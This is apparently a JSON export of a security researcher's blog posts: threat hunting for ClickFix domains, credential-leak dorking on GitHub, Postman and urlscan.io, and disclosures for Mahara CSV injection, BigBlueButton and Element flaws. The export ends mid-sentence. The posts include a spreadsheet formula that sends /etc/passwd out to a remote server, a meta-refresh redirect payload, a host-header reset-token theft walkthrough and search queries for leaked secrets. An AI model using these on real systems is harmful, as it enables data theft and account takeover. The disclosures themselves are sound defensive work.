[{"content":"Almost a year after my last ClickFix post, ClickFix continues to be all the rage and remains a technique of choice for initial access among many threat actors. ClickFix has since evolved from solving CAPTCHA and error prompts to impersonating documentation for products such as Claude Code, Mac storage cleaning guides, and malicious instructions via Medium blogs, among many other lures. This post will look at how a single ClickFix domain can be used to help discover many others.\nStarting with a known ClickFix domain, claude-code-macos[.]com, we can see it is typically advertised via Google Ads, as shown in the screenshot below:\nIf we now navigate to the Google Ads Transparency Center, we can search for ads across Google based on a given domain name. If we enter the ClickFix domain mentioned earlier and select “Ads in anywhere,” we are presented with the results below:\nClicking the domain name shows that three companies are paying to boost or advertise this domain via Google Ads. All of these companies are also marked as “Verified,” as shown in the screenshot below:\nIf we now click one of the companies, such as “LLT Group Incorporated,” we can view all of the ads they are paying for:\nAs highlighted in the previous image, we can now see several adverts that this company is paying for, including Claude Code lures across Grammarly and Kimi.\nThese may be Google Ads accounts that have been compromised and are being used by threat actors to publish malicious Claude Code lures, or they may be dummy companies created by threat actors. Regardless of how the Google Ads account is being abused, this vector allows us to pivot from one ClickFix domain to several others. 
This can be a useful technique for proactive threat hunting in defensive operations (e.g., blocking malicious domains across a corporate fleet) and for brand abuse investigations (e.g., reporting domain takedowns via trademark impersonation to better protect customers).\nAs with any investigative technique like the one outlined in this post, there are important caveats to consider. It should never be assumed that this approach provides complete coverage of all domains operated by a threat actor. One known visibility gap is that if Google removes an advert or domain in response to an abuse report, it may no longer appear in the Google Ads Transparency Center. This can impact defensive investigations, particularly when correlating activity such as DNS requests to determine whether a user has interacted with other ClickFix domains under a threat actor’s control.\n","permalink":"/blog/clickfix-google-ads-discovery/","summary":"Almost a year after my last ClickFix post, ClickFix continues to be all the rage and remains a technique of choice for initial access among many threat actors. ClickFix has since evolved from solving CAPTCHA and error prompts to impersonating documentation for products such as Claude Code, Mac storage cleaning guides, and malicious instructions via Medium blogs, among many other lures. This post will look at how a single ClickFix domain can be used to help discover many others.","title":"One Click(Fix) To Rule Them All, One Click(Fix) To Find Them"},{"content":"What is ClickFix? ClickFix is a social engineering technique increasingly being used by actors in the past few months. The technique relies on fooling users into running PowerShell or Terminal commands on their computers, through the use of fake error dialogue boxes. This post will look at how the domains involved in a ClickFix script can be latched onto to discover additional infrastructure. 
The ClickFix script in this case was used to download the SectopRAT malware; you can read more about the malware itself on my friend Chris's blog here.\nOur entry point for this campaign is cloudtechburner[.]com (recording below). When interacted with, the page fetches the ClickFix embed/payload from forfsakencoilddxga[.]com. We will now look at how forfsakencoilddxga[.]com can be latched onto to find other potential domains that are part of the ClickFix infrastructure for this campaign.\nLooking up our first hop (forfsakencoilddxga[.]com) on VirusTotal, we can see that it has nameserver values for Cloudflare. Cloudflare in some cases issues the same set of nameservers to zones in an account. Therefore, we can try to use a stab-in-the-dark technique to try to find other domains that belong to the same Cloudflare account. Generally, a set of nameservers on its own is not enough, and you need other correlations to establish a high level of confidence to say that domains are operating behind the same Cloudflare account.\nUsing the following search term in VirusTotal, entity:domain ns:cleo.ns.cloudflare.com ns:leah.ns.cloudflare.com, we are telling VirusTotal to give us all domains that have nameserver values of cleo.ns.cloudflare.com and leah.ns.cloudflare.com. We get 95 unique domains (as shown in the screenshot below). The reason we see 95 domains is because Cloudflare has roughly 900 nameservers, resulting in ~810,000 unique combinations of nameserver records, which means that different accounts or zones can get the same set of nameserver records.\nInterestingly, the very second domain we see in our search results is caprofklfkzttripwith[.]com. The domain was registered on the same date as our first hop, has the same registrar as our first hop (hello.co) and of course the same set of nameservers. For now, let's call this a low to moderate probability of these domains being related and dig into it further. 
If we then expand our VirusTotal search to look for this specific registrar, we end up with the four domains below.\n“Let's get this out onto a tray.” ~ Steve1989MREInfo\nBy inserting the four discovered domains into VirusTotal Graph, we start to build an image of what's going on. Specifically, we start to see an overlap in malicious and downloaded file detections, domain registrar, domain creation date, DNS records and cross-domain file interactions.\nBased on the information we discovered, we can establish that it's highly probable that these four domains are under the same Cloudflare account, are controlled by the same entity and are part of the same campaign. To discover what each domain does and how it all ties together into the bigger picture, head on over to Chris's blog!\n","permalink":"/blog/clickfix-infrastructure-discovery/","summary":"What is ClickFix? ClickFix is a social engineering technique increasingly being used by actors in the past few months. The technique relies on fooling users into running PowerShell or Terminal commands on their computers, through the use of fake error dialogue boxes. This post will look at how the domains involved in a ClickFix script can be latched onto to discover additional infrastructure. The ClickFix script in this case was used to download the SectopRAT malware; you can read more about the malware itself on my friend Chris's blog here.","title":"A Game Of Probabilities | Discovering ClickFix Infrastructure"},{"content":"Google Meet, Microsoft Teams and Zoom are all examples of common conferencing software used across large companies - companies that are large enough to be a juicy target for threat actors located in sanctioned countries. These actors, often just tech-savvy average joes, seek to get ahead by earning a US tech company salary. 
While their intent may not inherently be malicious, deception and fraud in getting the job can pose a reputational and legal risk to companies. This blog will cover how video conferencing software logs can be used to locate these threats.\nTo get the information from your conferencing tool of choice, you likely need a level of privileged access, which will vary from platform to platform. Using Zoom as an example, this support page lists where the information we are after is located. Specifically, a field called Speaker is present in meeting details, as shown in the screenshot below.\nActors are often observed using a laptop-farm type setup, where they use a computer in their home country to connect to a laptop located in the country they are pretending to live in. If proper OPSEC is not observed by actors or they have a lapse in situational awareness (e.g., joining a Zoom meeting invite from the origin device), these logs can help reveal their true location.\nAn example of a Speaker field log that would be interesting in such cases is GDM-245JN. When we research this model number, we see that various Iran-based sites are present in the results (screenshot below). The device in this case is a computer monitor, which has been selected as the audio output device by the actor. We can assess with high confidence that the device is primarily sold in Iran, and due to the trade embargoes, it is unlikely for this specific model number to be naturally present in countries which many firms can operate from.\nIn an ideal world, a repository or data source of model-number-to-geographic-location relations would help in creating an automated detection. At the time of writing, I am not aware of a source that provides this reliably for speaker and/or monitor model numbers, and manual research is required to confirm whether this is a useful indicator for a given instance. 
The technique detailed in the blog above can be used to conduct Threat Hunts and/or to add enrichment to existing suspects.\n","permalink":"/blog/trace-that-sound/","summary":"Google Meet, Microsoft Teams and Zoom are all examples of common conferencing software used across large companies - companies that are large enough to be a juicy target for threat actors located in sanctioned countries. These actors, often just tech-savvy average joes, seek to get ahead by earning a US tech company salary. While their intent may not inherently be malicious, deception and fraud in getting the job can pose a reputational and legal risk to companies.","title":"Trace That Sound"},{"content":"Dotfiles Backup, in the context of this blog, is a framework/methodology/concept. It is a collection of files, often starting with dots (as the name implies) where users (developers, system admins, etc) store their personalised configurations for a variety of software. These collections are often pushed to a git repository and contain configuration files for software such as Vim, VSCode, Zsh, .aliases, git, and so on.\nA common use case for dotfiles is when users join new companies and get issued a work laptop. Often we see them clone their dotfiles repository and symlink files to apply custom configuration for their favourite software. Over time these configurations may be updated and changed, such as tokens and credentials being saved to configuration files. Eventually, the user pushes a commit to save their dotfile repository, resulting in unintended credential leakage.\nOne of the most common (and generic) ways to look for intel or credential leakage via dotfiles is to search for the presence of the string “dotfile” (i.e. path:*dotfile* on GitHub) combined with other keywords of interest. For example, we know AWS CLI is widely used and parameters for AWS Secrets tend to start with keywords like “AWS_SECRET”. 
Therefore, if we use a search like (path:*dotfile* OR path:*dot-file* OR \"dotfile\") \"AWS_SECRET\" we may see some results after filtering through the noise (i.e. the result below from the 4th page). However, this approach is fairly generic and heavily limited by GitHub's five-page search limit and inability to sort by recently updated (to name a few restrictions).\nThe real benefit comes when the search is combined with well-defined keywords. For example, in this scenario you work at a company (domain s4.nz) that is currently using Artifactory, and usernames for Artifactory are user emails (i.e. bob.jones@s4.nz). With this in mind, you could run a threat hunt with the theory that someone may be leaking Artifactory credentials through dotfiles. An example search for this may look like (path:*dotfile* OR path:*dot-file* OR \"dotfile\") \"@s4.nz\" \"artifactory.s4.nz\". These types of searches often result in two findings: one, information an adversary could use for reconnaissance against a target company; two, discovery of credential leakage. While this example uses GitHub, the same logic can be applied across GitLab or Bitbucket instances.\nAt the time this post was published, I came across two main tutorials showing how to utilise dotfiles using different methodologies. The first tutorial is by Atlassian, using a config-based approach to manage dotfiles. This tutorial contained no mention of security or best (security) practices. The next tutorial is a GitHub Pages site maintained by a community; the site is thorough and contains a mention in the FAQ page on how to remove sensitive data (but unfortunately no mention of security or best practices otherwise).\nI am a firm believer that to make someone do something, you have to explain the why (i.e. educate them). 
It’s likely that when these tutorials are being followed, the consumers of these may not have security front of mind, or an understanding of the risks associated with following tutorials that you don’t understand completely. A small section on security or security hygiene can go a long way, especially when new members of the industry are following these tutorials. Managing security risks should always be about “Yes…but XYZ condition” instead of a straight “No”. With that in mind: “Yes, we can have dotfiles stored in a publicly accessible repository, but users need to be aware of the risks and should utilise secret scanning”.\n","permalink":"/blog/dotfiles/","summary":"Dotfiles Backup, in the context of this blog, is a framework/methodology/concept. It is a collection of files, often starting with dots (as the name implies) where users (developers, system admins, etc) store their personalised configurations for a variety of software. These collections are often pushed to a git repository and contain configuration files for software such as Vim, VSCode, Zsh, .aliases, git, and so on.\nA common use case for dotfiles is when users join new companies and get issued a work laptop.","title":"Dotfiles Backup - A Treasure Trove"},{"content":"Have you ever been in a situation where you are managing a large number of users and one of them has committed sensitive information to a repository on GitHub? The issue is exacerbated even more when the username is ambiguous, the .patch file does not have any helpful information and generally, no solid details are present to find out who made the commit.\nDepending on how your organisation works, you may be able to use .keys files! If a user has uploaded an SSH keypair to GitHub, you can find out their public SSH keys by appending .keys to the end of their username. 
For example, if we take Linus Torvalds, their GitHub profile is https://github.com/torvalds, and after appending .keys, we can see they have a key pair located at https://github.com/torvalds.keys.\nWith the public key we just obtained, we can now enumerate sources to see if the same key exists in internal records. For example, key pairs on bastion servers, internal git instances and any other tool which allows you to easily enumerate through public key pairs. If you get a match, this should hopefully allow you to close in on the culprit.\nI do want to note that this technique is a last resort and other easier methods should be tried first. The use case detailed here is super specific and only works if you have a record of public keys for your users, and if the user in question has re-used the same SSH key pair.\n","permalink":"/blog/github-keys-tracking/","summary":"Have you ever been in a situation where you are managing a large number of users and one of them has committed sensitive information to a repository on GitHub? The issue is exacerbated even more when the username is ambiguous, the .patch file does not have any helpful information and generally, no solid details are present to find out who made the commit.\nDepending on how your organisation works, you may be able to use .","title":"Tracking via GitHub Keys"},{"content":"Postman is an API platform for developers to design, build and test their APIs. The platform allows users to work in teams and organizations, giving users the option to share their workspace over the Internet. One of the features includes the ability to organize requests (GET, POST, PATCH, etc) on different ‘pages’, with the option to define request parameters, headers, authorization, body and tests. 
The issue at hand comes into play when request parameters are directly populated with values such as passwords, API tokens and secrets, combined with a workspace which has been shared publicly.\nIn order to find these workspaces, we use one of the best tools there is: Google Search. In the example below, I am using the ‘site’ search operator combined with a target. The target in my case is all New Zealand based sites with domain ending “co.nz”, but in your case, it could be a company, tool or platform.\nAs we can see in the screenshot above, we get a variety of workspaces. Not all workspaces will leak information, but in my experience (combined with the right Google Search), most ended up containing some form of unintended disclosure (ranging from PII to service credentials). Exploring one of the entries, as shown in the screenshots below, we can see the password has been leaked for a Gmail account, as well as an authorization token for an endpoint.\nAdditionally, if a workspace was once public, but has since been made private, remember to check out the Google Search cache. Clicking the ‘View source’ button on webcache.googleusercontent.com for the Postman link in question can reveal the token/password/credential, if the value was once accessible.\nThis technique can be used for non-interactive reconnaissance to gather and harvest credentials which have been leaked accidentally. In some cases, the workspace visibility can be enforced at an organisation level, to try to prevent this from happening, though developers still have the ability to spin up their own standalone workspace. A simple solution is to educate developers and users who use Postman for their day-to-day activities.\n","permalink":"/blog/postman-credentials/","summary":"Postman is an API platform for developers to design, build and test their APIs. 
The platform allows users to work in teams and organizations, giving users the option to share their workspace over the Internet. One of the features includes the ability to organize requests (GET, POST, PATCH, etc) on different ‘pages’, with the option to define request parameters, headers, authorization, body and tests. The issue at hand comes into play when request parameters are directly populated with values such as passwords, API tokens and secrets, combined with a workspace which has been shared publicly.","title":"Credential Harvesting via Postman"},{"content":"urlscan.io is a free and paid tool that is used to scan and analyse URLs. The tool is often used by Security Analysts and employees working in a SOC. It is also available as an integration add-on in several popular security tools such as Splunk SOAR and Cortex XSOAR. This post will be focusing on the Search functionality in urlscan.io and how it can be abused to extract sensitive content due to tooling misconfigurations or accidental information leakage.\nFirst, a small explanation on how search works on urlscan.io. On the home page, the default scan option is a ‘Public Scan’. What this means is that any URL submitted on the platform will be searchable by anyone on the Internet. Just like Google Dorking, the search functionality has filters which can be utilised to drill down to specific types of results. Fairly simple so far, right? Who's gonna put a sensitive link on a public scan? Well, that's where the issue comes in; specifically, there are two use cases to consider.\nUse case one: Manual submissions. Consider the screenshot below: there are two main properties to note, submitted URL and effective URL. A user has submitted a short link from their Vodafone Rewards site (submitted URL), which has then redirected to a unique URL (effective URL) containing a free movie ticket. 
This information is now available on the Internet for anyone to use, unless the user gets this removed from urlscan.io (it is unlikely that the user is aware of the scan being public in the first place).\nThe result above (confirmed expired at the time of publishing) was discovered using the following search filter:\npage.domain:\"nz\" AND page.url:\"voucher\" Additionally, consider this scenario: A SOC Analyst is in a hurry and trying to analyse a URL, which was present in a potential phish to an executive. Unknown to the analyst, the link is legitimate and redirects to a unique site with sensitive information on it. The analyst then Googles for a URL scanning tool and lands on the urlscan.io home page, which has an inviting wide search bar and a big green button. They then quickly enter the URL in the search bar and press enter, which has now resulted in an unintended information leakage due to the analyst not paying close attention. While the analyst is at fault here, it is not helped by a lack of warning or confirmation before the public scans are submitted.\nHere is another example where a password reset link has been made available for anyone to use, using an adapted search filter from above: page.domain:\"nz\" AND page.url:\"reset\".\nThis technique can be adapted to search for password reset links, PDF invoices with personal details and endless other use cases that rely on unique URLs. Sensitive public submissions have been observed from various large corporations and government agencies, so this is not something that is limited to small shops. Sometimes it’s the end user submitting these links themselves, as opposed to a Security Analyst or someone reviewing a phish.\nYou can also further expand this technique with file hashes. For example, a phishing kit might be using the same CSS file across its deployment. 
You can get the SHA256 hash of the CSS file and search urlscan.io for that hash in order to see submissions with that phishing kit. The same technique can be used against off-the-shelf software deployments, i.e. if WordPress password reset pages were using the same core CSS file, we can use the CSS file hash to find submissions that have exposed their password reset links.\nUse case two: Misconfigured tooling, either due to lack of knowledge or budget. Using the Cortex XSOAR urlscan.io integration as an example, the configuration field for scan type selected by default is ‘Public’ and unless an engineer is specifically changing that (or an analyst running the command with the private parameter), the results are going to be searchable using the methods above. Note that this behavior may have changed with the updated version or may no longer be applicable with deprecated commands. Additionally, some smaller shops do not have the budget for the Pro version of urlscan.io and default to free-tier public scans for operational needs, in order to not hit the free-tier limits imposed by other scan types.\nThis post is intended for educational purposes and the techniques mentioned here can be utilised by analysts or TI team members to search for information leakage against their own organisation domains.\n","permalink":"/blog/urlscan-dorking/","summary":"urlscan.io is a free and paid tool that is used to scan and analyse URLs. The tool is often used by Security Analysts and employees working in a SOC. It is also available as an integration add-on in several popular security tools such as Splunk SOAR and Cortex XSOAR. This post will be focusing on the Search functionality in urlscan.io and how it can be abused to extract sensitive content due to tooling misconfigurations or accidental information leakage.","title":"urlscan.io Dorking"},{"content":"Blue Team Level 1 is a certification offered by Security Blue Team. 
The certification is aimed at entry to junior level roles and consists of six primary domains. At the time of writing the cost for the certification was roughly NZ$800, which included access to training material for 4 months and 100 hours of access to a lab environment.\nThe training went over Security Fundamentals, Phishing Analysis, Threat Intelligence, Digital Forensics, Security Information and Event Management, and Incident Response. So, definitely a lot of useful content is being covered. I enjoyed the Phishing Analysis and Incident Response modules; they introduced some new tools and methodologies that I was previously unaware of (even after two years of SOC experience), so there is definitely knowledge to be gained for all experience levels.\nSome things that could be worked on are the lab environments and the 30-day wait time for the exam results. At the time I did my training, some of the labs were unavailable and the instructions were not that clear on how to access the unavailable content. Additionally, the 30-day wait time for the exam results leaves the user in limbo, as I wasn't sure if I should start studying for another certification or continue studying BTL1 content (in case I didn't receive enough marks). Saying that, I have been told that these issues will be addressed with the new platform releasing sometime in 2022.\nThe exam was 24 hours long, with 12 hours of lab time and an additional 12 hours to finish the report. The exam template can be accessed at any time during the training and I strongly recommend going over the template thoroughly, before starting the exam (so that you have a plan of attack in place). I was able to complete the exam and the report within 10 hours, so the time provided is pretty generous. 
Due to the NDA, I can't provide more information about the exam, but a key takeaway is: don't underestimate it, especially if you are new to the field.\nAfter 27 days, I received an email from Security Blue Team informing me that I had passed with Gold (90%+). Even though I passed with Gold, the results email also contained exam feedback on what went well and what could be done better (which clearly shows that the SBT team is invested in improving and developing their students).\n","permalink":"/blog/btl1/","summary":"Blue Team Level 1 is a certification offered by Security Blue Team. The certification is aimed at entry to junior level roles and consists of six primary domains. At the time of writing the cost for the certification was roughly NZ$800, which included access to training material for 4 months and 100 hours of access to a lab environment.\nThe training went over Security Fundamentals, Phishing Analysis, Threat Intelligence, Digital Forensics, Security Information and Event Management, and Incident Response.","title":"Blue Team Level 1 Review"},{"content":"Mahara is an electronic portfolio system that is used as an eLearning tool by education institutions around the globe. The software contains the ability to export records from the system into a CSV file. This blog will cover how that functionality can be abused (when inputs are not escaped correctly) to conduct local command execution (aka CSV injection).\nFor this demonstration, two accounts will be used. The first account will be the malicious actor where CSV injection payloads are saved into editable inputs. The second account will be the victim/system administrator with the ability to export data as CSV from the application.\nWe will first log in with the student account, aka the malicious actor in this demonstration, to set the payload. The student account can update their profile details, such as the first and last name. 
We will use this input as the vector for injecting our example payload shown below:\n='file:///etc/passwd'#$passwd.A1 After the profile is saved, the payload is set and no other action is required from the malicious actor. Note: for this injection to be successful, the victim needs to have a CSV processing application that provides minimal or no warning before command/formula execution. In a nutshell, luck and naive human interaction play a big part in whether this is successful.\nWe will now log into our victim account, aka system administrator. After logging in, click on the wrench icon on the top right, followed by ‘People search’ under the ‘People’ category. Then select all users or specific ones, and click ‘Get reports for the selected accounts’. After that, you will be redirected to the page shown below, where clicking the download button presents the CSV file.\nWhen the CSV file is opened, there are two possible outcomes. First option: The user is prompted with a warning or the ability to open the file is denied. This is the likely result with most modern applications and operating systems. The other option: There is no warning presented to the user and the file opens, or a warning is presented and the user decides to open the file anyway without reading the warnings (while unlikely, it does happen).\nAssuming that the file has successfully opened and/or the warnings have been ignored, the payload will trigger the injected formula. In the example above, a cell is simply populated with the content of the file /etc/passwd. What if we wanted to do more than that and steal data to a remote server? 
We can use a payload like the one below:\n=WEBSERVICE(CONCATENATE(\"http://127.0.0.1:8000/\",('file:///etc/passwd'#$passwd.A1))) The payload above essentially sends a GET request and appends the value of the provided file/cell as a GET request parameter, which leads to data exfiltration from the victim's device. In the screenshot below, we can see that GET requests are being received with content from the /etc/passwd file, on a local webserver.\nData exfiltration is one possible technique that can be used; countless other approaches can be utilised.\nThis issue was reported to the Mahara team in early 2021, while I was working at Catalyst IT. A fix for this was released on 28th October and CVE-2021-40848 was released by MITRE on 11th November. This issue is not specific to Mahara or due to a vulnerability in the system; however, the patch released by the Mahara team helps safeguard their user base against Mahara being used as a vector of transmission.\n","permalink":"/blog/cve-2021-40848/","summary":"Mahara is an electronic portfolio system that is used as an eLearning tool by education institutions around the globe. The software contains the ability to export records from the system into a CSV file. This blog will cover how that functionality can be abused (when inputs are not escaped correctly) to conduct local command execution (aka CSV injection).\nFor this demonstration, two accounts will be used. The first account will be the malicious actor where CSV injection payloads are saved into editable inputs.","title":"CVE-2021-40848 Mahara | CSV Injection"},{"content":"eLearnSecurity Junior Penetration Tester (eJPT) is a certification offered by eLearnSecurity. The training for this certification is provided by the parent company called INE (Inter Network Experts). 
In order to train for eJPT, INE offers a Penetration Testing Student (PTS) pathway, free of charge, under the recently launched starter pass.\nThe training itself consists of 38 hours worth of content, including slides, videos, practical labs and three practice black boxes. Coming from a HackTheBox background, I had familiarity with most of the tools and concepts offered. The networking and Windows lab content provided an assurance for my base understanding and gave an insight into how the exam would be structured.\nThe exam for this certification is entirely hands-on and consists of 20 multichoice questions. Students are provided with 72 hours to complete the exam. Tasks can include exploiting hosts and answering questions about the content on the machine. Enumeration is the key.\nIn summary, the certification offers basic application and networking concepts, as well as an introduction to popular penetration testing tools. The certification would make a good addition for interns at penetration testing shops, where the base knowledge is fortified and built upon.\n“Remember your ABC's: Always Be Crackin'” ~ Joshua Wright\n","permalink":"/blog/elearnsecurity-ejpt/","summary":"eLearnSecurity Junior Penetration Tester (eJPT) is a certification offered by eLearnSecurity. The training for this certification is provided by the parent company called INE (Inter Network Experts). In order to train for eJPT, INE offers a Penetration Testing Student (PTS) pathway, free of charge, under the recently launched starter pass.\nThe training itself consists of 38 hours worth of content, including slides, videos, practical labs and three practice black boxes. Coming from a HackTheBox background, I had familiarity with most of the tools and concepts offered.","title":"eLearnSecurity eJPT Review"},{"content":"Matrix is an open standard and protocol for real-time communication. One of the Matrix packages is a reference homeserver, known as Synapse. 
This means that Synapse is essentially a server that organisations and communities can run to host and access their own Matrix server. This also means that those organisations are able to control who can sign up and access that particular server.\nTo register on a server, the portal asks for details such as name, password, and email. The email field can be restricted to a particular domain, which is enforced through a regular expression (regex). This is particularly handy for companies wanting to only allow specific people on the server. For example, if the server is run by Facebook, they may limit registration to anyone who has a @facebook.com email address.\nThis is where the bypass comes in. The regex provided in the sample/commented-out configuration file in Matrix Synapse was not terminated (anchored) after the intended top-level domain (TLD). What this means is that an external actor can craft an out-of-scope domain and email address, such as the one shown below.\nDomain: facebook.com.sakshamanand.com\nEmail: example@facebook.com.sakshamanand.com\nThe crafted email address above will successfully validate and authenticate non-organisation actors, resulting in information leakage and other attack vectors, depending on the server configuration. Additionally, given that this issue is present in sample documentation, it is possible that a wide range of users could have copied configurations for various Synapse servers based on this file, where the regex flaw is present.\nThe issue was present in a configuration entry on line 1247 of the sample_config.yaml file, known as allows_local_3pids, which was also called by another functionality in the application. 
A suggested fix for this regex is to anchor the pattern so that it terminates after the TLD, and to restrict the username part of the email address, as shown below.\nOriginal: .*@matrix\\.org\nFixed: ^[^@]+@matrix\\.org$\nI reported the issue upstream to Matrix Security on 31st March 2021, and a fix was made available by the maintainers under this pull request on the same day.\n","permalink":"/blog/matrix-synapse-regex-bypass/","summary":"Matrix is an open standard and protocol for real-time communication. One of the Matrix packages is a reference homeserver, known as Synapse. This means that Synapse is essentially a server that organisations and communities can run to host and access their own Matrix server. This also means that those organisations are able to control who can sign up and access that particular server.\nTo register on a server, the portal asks for details such as name, password, and email.","title":"Organisation Registration Bypass – Matrix Synapse"},{"content":"Element (formerly Riot and Vector) is an open source instant messaging application implemented over the Matrix protocol. Matrix is known for supporting end-to-end encryption and the application itself is available for various platforms, including Desktop, Mobile and Web. This post will only be addressing the mobile version, which contained the vulnerability at the time this was written.\nFirstly, the Android application in question is available at this link, with the code base for the application hosted here. 
The vulnerability in question is present in the native HTML Viewer application that Element opens attachments with, instead of a browser, which does not correctly implement a sandbox mode, leading to Cross Site Scripting (XSS) being possible via meta tag injection.\nIf an HTML attachment is uploaded to a room or chat with a payload such as <meta http-equiv='refresh' content='0' URL='http://sakshamanand.com/xss.html' /> in the header, the built-in viewer/browser functionality should prevent scripts and plugins from executing when the download/view attachment button is clicked. This is correctly being done on the servers, where the files are rendered in browsers with appropriate headers in place, as shown in the screenshot below:\nHowever, if the same attachment is opened in the Android Element application, the logic first tries to render the HTML file through the native HTML Viewer; the meta header is then accepted and the user is forwarded to the attack site via an external browser, as shown in the screenshots below:\nThis is considered a low-severity security vulnerability, as if any user’s client shares a malicious payload (especially in public Matrix channels), anyone who clicks (accidentally or intentionally) on it can be vulnerable to a variety of attacks, including, but not limited to:\nMisleading or Automated Infected File Downloads;\nDue to human nature, a user may be in the mindset that in order to view the attachment they have to first download the file and open it. An attacker is able to name the file something a user may be expecting, for example ‘sales_results.pdf’ if Matrix is being used in a commercial environment, and the file will be downloaded (at times without any prompt) and opened by the user. 
Depending on the device and its settings, a variety of actions can trigger: the file may automatically download and open on click, the actual extension of the file can be hidden (a user may think they are downloading a PDF file when in fact it may be an app package) and so on. The payload target can be replaced with Android Deep Link URLs, some of which accept body content. For example, “example://sakshamanand?data=maliciousContent” can allow for stacked vulnerabilities, if the target application contains this type of behaviour.\nPhishing Portals & Techniques;\nA web page can be created with a similar domain name (for example, if the victim is example.com, then the attacker uses example.co), where the user is prompted to log in using their credentials in order to view the “attachment” they just clicked on.\nVarious other applicable XSS-type attacks.\nThe issue above was tested with 10+ Android devices/users, and was present in all instances. Additionally, this vulnerability was reported to upstream developers on 29th October 2020, through the security policy listed on GitHub.\nUpdate 01/12/20: The Matrix Security team responded regarding the issue above and mentioned that, given the issue is with the native HTML Viewer in Android, no action can be taken at the Element application level. I believe the bug ultimately comes down to a difference in expectations between the HTML Viewer and the Element Android application. Given the minor nature of this issue, I am publishing this article.\n","permalink":"/blog/element-unvalidated-redirect-through-html-viewer/","summary":"Element (formerly Riot and Vector) is an open source instant messaging application implemented over the Matrix protocol. Matrix is known for supporting end-to-end encryption and the application itself is available for various platforms, including Desktop, Mobile and Web. 
This post will only be addressing the mobile version, which contained the vulnerability at the time this was written.\nFirstly, the Android application in question is available at this link, with the code base for the application hosted here.","title":"Unvalidated Redirect HTML Viewer – Element Messenger"},{"content":"Back in April, one of the systems I was testing was a video conferencing application known as BigBlueButton, an open source challenger to Zoom.\nThe BigBlueButton installation comes with a user-friendly interface, known as Greenlight, which ties in nicely with the BigBlueButton server. While most corporate installations would be using LDAP authentication, at times an installation will be based on a standard username and password login mechanism, which is handled by Greenlight.\nPart of the standard authentication process in Greenlight is the ‘Forgot Password?’ functionality, which, when clicked, prompts the user for their email and presents a submit button, as shown in the screenshot below:\nFor the purpose of this demonstration, ‘saksham@example.com’ is being used as the victim’s email; however, in reality, an attacker will use the corporate email address of their victim (i.e. an executive in some company). When the form is populated and submitted, the requests can be captured through Burp Suite or through the network tab of the browser debugger. The captured request headers will show a range of different entries, including the Host header and the Origin header, as shown below:\nHost: bigbluebutton.example.com\nOrigin: https://bigbluebutton.example.com\nIn a real-world scenario, the domain in the header will be replaced with something that looks similar to the company’s existing domain name. For example, if a company owns ‘example.com’, then an attacker might register ‘example.co’ to increase the likelihood of a successful phishing attack. 
For the purpose of this demonstration, the Host and Origin headers were replaced with the following entries:\nHost: www.sakshamanand.com\nOrigin: https://www.sakshamanand.com\nThe request was then released from the client and accepted by the server with a 302 response code. Shortly afterwards, an email appeared in the example inbox, as shown below:\nWhen the blue ‘Reset Password’ button is clicked, the following link opens in the browser:\nhttps://www.sakshamanand.com/gl/password_reset/TOKEN_REDACTED/edit\nFrom here, two attacks are possible:\nThe attacker can capture the victim’s password reset token from the link sent to the attacker-controlled domain and use it to set an arbitrary password. From there they can do damage that is contained within the BigBlueButton installation; however, this will lock the victim out of BigBlueButton and the attack may not last long.\nOr, the attacker can create a fake BigBlueButton password reset portal, something that looks exactly like the real one (combined with the similar-looking domain name, example.co), then capture the new password that the victim picks. This would allow the attacker to continue using the vulnerable BigBlueButton account without locking the victim out, and the attacker can try to use the new password in other applications within the company (under the assumption that the victim might have used the same password elsewhere).\nThese attacks are generally possible in package-based software, where the software is aimed at multiple consumers for self-installation. The application was vulnerable to this issue as it was directly reading the headers without validating them. 
Generally, in order to mitigate Host Header Injection attacks, an allow-list (whitelist) of permitted hostnames needs to be implemented, and the code must validate the incoming Host and Origin headers against that list before trusting them in outgoing responses, such as password reset links.\nThis issue was reported to BigBlueButton in May 2020 and was promptly fixed by the project maintainers under this pull request. A CVE for this issue was also released by MITRE on 30th September under https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26163.\n","permalink":"/blog/host-header-injection-bigbluebutton/","summary":"Back in April, one of the systems I was testing was a video conferencing application known as BigBlueButton, an open source challenger to Zoom.\nThe BigBlueButton installation comes with a user-friendly interface, known as Greenlight, which ties in nicely with the BigBlueButton server. While most corporate installations would be using LDAP authentication, at times an installation will be based on a standard username and password login mechanism, which is handled by Greenlight.","title":"CVE-2020-26163 BigBlueButton | Host Header Injection"},{"content":"As part of a penetration testing project at Catalyst IT, I conducted a test on an open source video conferencing system known as BigBlueButton, an open source challenger to Zoom.\nBigBlueButton contains a closed captions module that allows a user to manually type captions, and all users with captions enabled can see them at the bottom of the screen. While the ability to add captions is restricted to moderator-level permissions, this issue is exacerbated when the breakout room functionality is used, as all users are then granted moderator-level permissions, allowing them to write captions.\nWhen a payload is inserted into the captions editor, it instantly triggers and appears on the screen of all users. In the screenshot below, on the left, the user has moderator-level permissions and is writing the closed captions in the text pad editor. 
On the right, the user has a standard account with captions enabled.\nThis issue existed due to ‘dangerouslySetInnerHTML’ being used in the React application. This issue was reported upstream and was fixed by the product owners under this pull request. The issue was also reported to MITRE on 2nd April, and the following CVE was released for it on 23rd April: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12113.\n","permalink":"/blog/cve-2020-12113/","summary":"As part of a penetration testing project at Catalyst IT, I conducted a test on an open source video conferencing system known as BigBlueButton, an open source challenger to Zoom.\nBigBlueButton contains a closed captions module that allows a user to manually type captions, and all users with captions enabled can see them at the bottom of the screen. While the ability to add captions is restricted to moderator-level permissions, this issue is exacerbated when the breakout room functionality is used, as all users are then granted moderator-level permissions, allowing them to write captions.","title":"CVE-2020-12113 BigBlueButton | Closed Captions XSS"},{"content":"Easy Phish is an Open Source Intelligence (OSINT) challenge on hackthebox.eu, which provides the challenge flag through publicly available information. This walk-through will provide step-by-step instructions on how that flag can be obtained.\nCustomers of secure-startup.com have been receiving some very convincing phishing emails, can you figure out why?\nWith the challenge brief above, three main points can be identified:\nThe scope of the target is the secure-startup.com domain and/or other related entities.\nThe issue is related to emails.\nThe type of attack at hand is a phishing attack.\nWith the points above, one of the first steps is to google how email phishing can be prevented on a domain. 
